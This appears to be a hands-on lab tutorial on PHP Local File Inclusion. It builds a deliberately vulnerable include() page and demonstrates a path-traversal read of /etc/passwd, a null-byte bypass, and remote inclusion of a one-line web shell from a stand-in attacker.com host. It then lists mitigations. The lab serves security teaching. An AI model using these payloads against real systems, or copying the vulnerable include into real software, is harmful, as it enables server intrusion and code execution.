Objective
Learn how to exploit Local File Inclusion (LFI) vulnerabilities to read sensitive files on the server and understand how attackers can escalate this to Remote File Inclusion (RFI) or code execution.
Scenario
You are evaluating a web application’s security that allows users to load different pages through URL parameters. Due to improper input validation, the application is vulnerable to Local File Inclusion (LFI), enabling attackers to read sensitive files on the server.
Lab Setup
Prerequisites:
- Basic knowledge of PHP and Linux file systems.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script with File Inclusion
Create a file index.php:
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
include($page);
} else {
echo "<h2>Welcome to the Vulnerable Website</h2>";
}
?>Additional Files for Inclusion
Create two files for testing legitimate file inclusion:
about.php:
<h2>About Us</h2>
<p>This is the about page.</p>contact.php:
<h2>Contact Us</h2>
<p>Email us at contact@example.com.</p>Running the Application
Start the Apache server.
Place all files in the web server’s root directory (htdocs for XAMPP).
Open http://localhost/index.php?page=about.php to see the About page.
Exploitation Steps
Step 1: Testing for LFI Vulnerability
Open the browser and navigate to:
http://localhost/index.php?page=../../../../etc/passwd (On Windows, try: ../../../../windows/system32/drivers/etc/hosts)
Expected Result:
- The content of the
/etc/passwdfile is displayed, exposing sensitive system information.
Step 2: Using Null Byte Injection (if needed)
Some servers append .php to the input. To bypass this, use a null byte (%00):
http://localhost/index.php?page=../../../../etc/passwd%00Step 3: Escalation to Remote File Inclusion (RFI)
If remote file inclusion is allowed (with allow_url_include=On), load remote files:
http://localhost/index.php?page=http://attacker.com/shell.txtExample content of shell.txt:
<?php system($_GET['cmd']); ?>This allows remote code execution by navigating to:
http://localhost/index.php?page=http://attacker.com/shell.txt&cmd=whoamiSolution and Prevention
Problem Analysis
- The application includes files based on unvalidated user input, exposing server files.
Fixing the Vulnerability
Whitelist Allowed Pages
Restrict file inclusion to predefined pages:
<?php
$whitelist = ['about.php', 'contact.php'];
if (isset($_GET['page']) && in_array($_GET['page'], $whitelist)) {
include($_GET['page']);
} else {
echo "<h2>Page not found.</h2>";
}
?>Use Static File Paths
Avoid dynamic inclusion with user input.
<?php
$page = basename($_GET['page']);
include("pages/" . $page);
?>Disable URL File Inclusion
Edit php.ini to prevent remote file inclusion:
allow_url_include = Off
allow_url_fopen = OffImplement Input Validation
Sanitize and validate input to prevent directory traversal:
<?php
$page = preg_replace('/[^a-zA-Z0-9_\.]/', '', $_GET['page']);
include("pages/" . $page);
?>Testing After Fix
Retry accessing sensitive files with:
http://localhost/index.php?page=../../../../etc/passwdObserve that the application blocks unauthorized file access.
Conclusion
In this lab, you exploited a Local File Inclusion (LFI) vulnerability to access sensitive server files and demonstrated how it could escalate to Remote File Inclusion (RFI) for code execution. You also learned mitigation strategies like input validation, file whitelisting, and disabling URL inclusion to secure applications against file inclusion attacks.
0 Comments